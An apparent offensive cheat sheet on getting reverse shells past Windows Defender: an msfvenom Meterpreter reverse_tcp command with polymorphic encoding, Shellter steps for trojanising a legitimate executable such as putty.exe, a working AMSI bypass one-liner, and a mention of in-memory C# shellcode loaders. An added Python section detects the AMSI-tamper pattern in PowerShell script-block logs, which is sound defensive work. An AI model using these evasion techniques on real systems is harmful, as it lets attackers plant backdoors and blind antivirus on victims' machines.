# Encoding & Obfuscation

How to stop Windows Defender from eating your shell.

## 1. Encoding (Msfvenom)

It does not make the binary undetectable, but it helps against static network filters.

* `shikata_ga_nai`: the classic polymorphic encoder.

  ```bash
  msfvenom -p windows/meterpreter/reverse_tcp ... -e x86/shikata_ga_nai -i 10
  ```

## 2. Shellter (Dynamic Injection)

Injects your shellcode into a legitimate executable (e.g. `putty.exe`).

* Install Shellter (`apt install shellter`).
* "Auto" mode.
* Pick a legitimate PE.
* Payload: Meterpreter Reverse TCP.

## 3. PowerShell Obfuscation

PowerShell is heavily monitored (AMSI).

* **AMSI Bypass**:

  ```powershell
  [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
  ```
* **Tools**: `Invoke-Obfuscation`.
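From the blue-team side, the reflection one-liner above is exactly the kind of thing PowerShell Script Block Logging (Event ID 4104) records, whether or not AMSI ever gets to scan it. The following is an added example (not part of the original notes) of a small scanner that runs over constructed script-block entries, normalizes two cheap obfuscation tricks (`'Amsi'+'Utils'` string splitting and backtick insertion, both of which `Invoke-Obfuscation` produces) and flags blocks that reach into `AmsiUtils` via reflection. The log lines and the detection rule are my own assumptions, not a vendor signature.

```python
import re

# Constructed sample script-block log entries, modelled on what Windows writes as
# Event ID 4104 when Script Block Logging is enabled. These are not real logs.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: ordinary admin activity
    "Get-ChildItem C:\\Users | Select-Object Name",
    # 1: the plain AMSI-tamper one-liner
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    # 2: same thing with string concatenation to split the keywords
    "[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils')"
    ".GetField('amsi'+'InitFailed','NonPublic,Static').SetValue($null,$true)",
    # 3: same thing with random casing and backtick escapes inside the strings
    "[rEf].aSsEmBlY.gEtTyPe('System.Management.Automation.Am`siUtils')"
    ".gEtFiElD('am`siInitFailed','NonPublic,Static').sEtVaLuE($null,$true)",
    # 4: only mentions the class name; should NOT be flagged
    "Write-Host 'AmsiUtils is the name of a class, this line only mentions it'",
]


def normalize(block: str) -> str:
    """Undo light obfuscation so that simple substring rules can be applied."""
    text = block.replace("`", "")  # backtick is PowerShell's escape char; dropping it rejoins split tokens
    # Collapse 'Amsi'+'Utils' (any quote style, any spacing) back into AmsiUtils.
    text = re.sub(r"['\"]\s*\+\s*['\"]", "", text)
    return text.lower()  # PowerShell is case-insensitive, so the rule should be too


def is_amsi_tamper(block: str) -> bool:
    """Flag a script block that reflects into AmsiUtils to touch its private state.

    Requiring both the class name and a reflection/field indicator keeps a bare
    mention of the word in a string from firing the rule (assumed heuristic).
    """
    n = normalize(block)
    if "amsiutils" not in n:
        return False
    return "amsiinitfailed" in n or ".getfield(" in n


def scan(blocks):
    """Return the indices of the script blocks that match the rule."""
    return [i for i, b in enumerate(blocks) if is_amsi_tamper(b)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"[!] AMSI tamper pattern in script block {idx}: {SAMPLE_SCRIPT_BLOCKS[idx][:60]}...")
```

The rule deliberately stays narrow: it catches the pattern this page shows and the two most common ways of disguising it, nothing more. Heavier obfuscation (encoded commands, format-string reassembly) needs the decoded form first, which is why 4104 logging is valuable: it records the block after PowerShell has resolved it, so a detection like this runs on what actually executed rather than on the wire bytes.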

## 4. Custom C# Loaders

The most effective approach nowadays. Compile your own loader that decrypts the shellcode in memory.

